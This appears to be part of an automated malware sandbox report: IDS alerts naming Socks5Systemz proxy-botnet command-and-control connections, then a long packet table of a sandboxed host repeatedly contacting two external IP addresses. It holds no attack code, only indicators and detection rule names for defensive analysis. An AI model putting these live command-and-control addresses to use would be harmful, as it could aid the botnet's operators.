                                                                        03/29/24-12:59:30.918916TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:10.122007TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975480192.168.2.445.142.214.240
                                                                        03/29/24-12:59:37.106191TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24978980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:07.153408TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14975080192.168.2.445.142.214.240
                                                                        03/29/24-12:59:52.843294TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24980780192.168.2.445.142.214.240
                                                                        03/29/24-12:59:34.137988TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14978580192.168.2.445.142.214.240
                                                                        03/29/24-12:59:14.168811TCP2050112ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M24975980192.168.2.445.142.214.240
                                                                        03/29/24-12:59:29.458062TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977980192.168.2.445.142.214.240

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 29, 2024 12:58:53.805278063 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:54.025074005 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:54.025191069 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:54.025398016 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:54.245042086 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:54.341233015 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:54.341332912 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:54.346235037 CET497372023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:54.552602053 CET20234973788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:54.552692890 CET497372023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:54.552833080 CET497372023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:54.759058952 CET20234973788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:54.759731054 CET497372023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:54.965931892 CET20234973788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:54.966330051 CET20234973788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:55.009177923 CET497372023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:56.981125116 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:57.200521946 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:57.321274996 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:57.321410894 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:57.434223890 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:57.653515100 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:57.738240004 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:57.738471985 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:57.739649057 CET497392023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:57.945950031 CET20234973988.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:57.946024895 CET497392023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:57.946115971 CET497392023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:57.946167946 CET497392023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:58.059144974 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.059504986 CET4974080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.152240038 CET20234973988.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:58.152633905 CET20234973988.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:58:58.152699947 CET497392023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:58:58.278652906 CET804973645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:58.278728962 CET804974045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:58.278853893 CET4973680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.278893948 CET4974080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.279145002 CET4974080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.498589993 CET804974045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:58.586544991 CET804974045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:58.586616039 CET4974080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.699589014 CET4974080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.699914932 CET4974180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.916260004 CET804974145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:58.916424036 CET4974180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.916636944 CET4974180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:58.919060946 CET804974045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:58.919145107 CET4974080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.133052111 CET804974145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:59.219975948 CET804974145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:59.220051050 CET4974180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.340393066 CET4974180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.340682030 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.556740046 CET804974145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:59.556808949 CET4974180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.557995081 CET804974245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:59.558079004 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.558298111 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.775963068 CET804974245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:59.854916096 CET804974245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:58:59.855061054 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:58:59.965425014 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.182905912 CET804974245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:00.274084091 CET804974245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:00.274226904 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.406862020 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.407176971 CET4974380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.624646902 CET804974245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:00.624802113 CET4974280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.626153946 CET804974345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:00.626243114 CET4974380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.626739979 CET4974380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:00.845482111 CET804974345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:00.923988104 CET804974345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:00.924118996 CET4974380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.044995070 CET4974380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.045376062 CET4974480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.266232967 CET804974345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:01.266318083 CET4974380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.268094063 CET804974445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:01.268163919 CET4974480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.268338919 CET4974480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.489006996 CET804974445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:01.578259945 CET804974445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:01.578353882 CET4974480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.706271887 CET4974480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.706584930 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.923901081 CET804974545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:01.924040079 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.924237967 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:01.926774979 CET804974445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:01.926851034 CET4974480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.141653061 CET804974545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:02.229691982 CET804974545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:02.229748011 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.340536118 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.559200048 CET804974545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:02.636924028 CET804974545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:02.637011051 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.751641035 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.751964092 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.969068050 CET804974545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:02.969146967 CET4974580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.972357035 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:02.972430944 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:02.972625017 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:03.193037033 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:03.279911041 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:03.279987097 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:03.387979984 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:03.608721018 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:03.695990086 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:03.696019888 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:03.696142912 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:03.697427034 CET497472023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:59:03.903623104 CET20234974788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:59:03.903755903 CET497472023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:59:03.903882027 CET497472023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:59:03.903939962 CET497472023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:59:04.012270927 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.012624025 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.110052109 CET20234974788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:59:04.110074997 CET20234974788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:59:04.110341072 CET20234974788.80.148.19192.168.2.4
                                                                        Mar 29, 2024 12:59:04.110393047 CET497472023192.168.2.488.80.148.19
                                                                        Mar 29, 2024 12:59:04.232958078 CET804974645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:04.233067989 CET4974680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.233402967 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:04.233489037 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.233731985 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.454185009 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:04.543636084 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:04.543719053 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.653286934 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:04.873845100 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:04.952740908 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:04.952924967 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.059288979 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.280066013 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:05.364540100 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:05.364639044 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.481348991 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.481771946 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.701484919 CET804974945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:05.701594114 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.701803923 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.702765942 CET804974845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:05.702826977 CET4974880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:05.920839071 CET804974945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:05.999649048 CET804974945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:05.999778032 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.106339931 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.325231075 CET804974945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:06.412883043 CET804974945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:06.412954092 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.528192997 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.528491020 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.747149944 CET804974945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:06.747251987 CET4974980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.747888088 CET804975045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:06.747960091 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.748155117 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:06.968024015 CET804975045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:07.046247959 CET804975045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:07.046318054 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.153408051 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.372889042 CET804975045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:07.458676100 CET804975045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:07.458790064 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.586270094 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.586611986 CET4975180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.804250002 CET804975145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:07.804372072 CET4975180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.805202961 CET4975180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:07.805519104 CET804975045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:07.805583000 CET4975080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.022984982 CET804975145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:08.101895094 CET804975145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:08.101964951 CET4975180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.215455055 CET4975180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.215962887 CET4975280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.433906078 CET804975145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:08.433983088 CET4975180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.434894085 CET804975245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:08.434962034 CET4975280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.435174942 CET4975280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.652483940 CET804975245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:08.741849899 CET804975245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:08.741936922 CET4975280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.856039047 CET4975280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:08.856319904 CET4975380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.073698997 CET804975245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:09.073765039 CET4975280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.075498104 CET804975345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:09.075577974 CET4975380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.075777054 CET4975380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.294986010 CET804975345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:09.380022049 CET804975345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:09.380141973 CET4975380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.497020006 CET4975380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.497309923 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.713552952 CET804975445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:09.713761091 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.713854074 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.716573000 CET804975345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:09.716650009 CET4975380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:09.929989100 CET804975445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:10.009288073 CET804975445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:10.009350061 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.122006893 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.338351011 CET804975445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:10.425319910 CET804975445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:10.425404072 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.543561935 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.543858051 CET4975580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.759927988 CET804975445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:10.760020018 CET4975480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.764368057 CET804975545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:10.764446974 CET4975580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.764656067 CET4975580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:10.985243082 CET804975545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.064590931 CET804975545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.064685106 CET4975580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.184175968 CET4975580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.184494972 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.402733088 CET804975645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.402893066 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.403064966 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.404890060 CET804975545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.404952049 CET4975580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.620479107 CET804975645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.705988884 CET804975645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.706095934 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.825189114 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.825474977 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.042998075 CET804975645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.043083906 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.044714928 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.044796944 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.050126076 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.270544052 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.361087084 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.361222029 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.485224009 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.486033916 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.704586029 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.704684019 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.708247900 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.708326101 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.708509922 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.930782080 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.009927988 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.009989977 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.121896029 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.345434904 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.428590059 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.428703070 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.543693066 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.544008017 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.760425091 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.760554075 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.760736942 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.766047001 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.766113043 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.977118969 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.055845976 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.055942059 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.168811083 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.386018991 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.470607996 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.470706940 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.590461016 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.590784073 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.806943893 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.807013988 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.815876007 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.815963030 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.816267967 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.038817883 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.117500067 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.117611885 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.233782053 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.234560013 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.452126026 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.452214003 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.452589989 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.456139088 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.456209898 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.669976950 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.754421949 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.754576921 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.874087095 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.874305964 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.091888905 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.091959953 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.093633890 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.093803883 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.093878984 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.313704014 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.402996063 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.403068066 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.512774944 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.732244015 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.811521053 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.811726093 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.918884993 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.138339043 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.222748041 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.222810984 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.340646029 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.340984106 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.560899973 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.560928106 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.561058998 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.561110973 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.561358929 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.783201933 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.862667084 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.862726927 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.981065035 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.981394053 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.200515032 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.200572014 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.200723886 CET804976445.142.214.240192.168.2.4
